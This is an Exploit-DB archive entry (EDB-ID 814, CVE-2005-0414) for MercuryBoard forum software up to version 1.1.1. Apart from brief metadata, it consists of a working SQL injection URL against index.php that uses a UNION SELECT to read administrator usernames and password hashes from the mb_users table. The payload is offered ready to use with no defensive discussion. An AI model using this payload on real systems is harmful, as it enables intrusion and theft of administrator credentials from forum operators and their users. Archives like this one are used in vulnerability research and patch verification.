MercuryBoard <= 1.1.1 Working SQL Injection

2005-02-12T00:00:00
ID EDB-ID:814
Type exploitdb
Reporter Zeelock
Modified 2005-02-12T00:00:00

Description

MercuryBoard <= 1.1.1 Working Sql Injection. CVE-2005-0414. Webapps exploit for php platform

                                        
                                            # little late posting this /str0ke

Exploit:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*

# milw0rm.com [2005-02-12]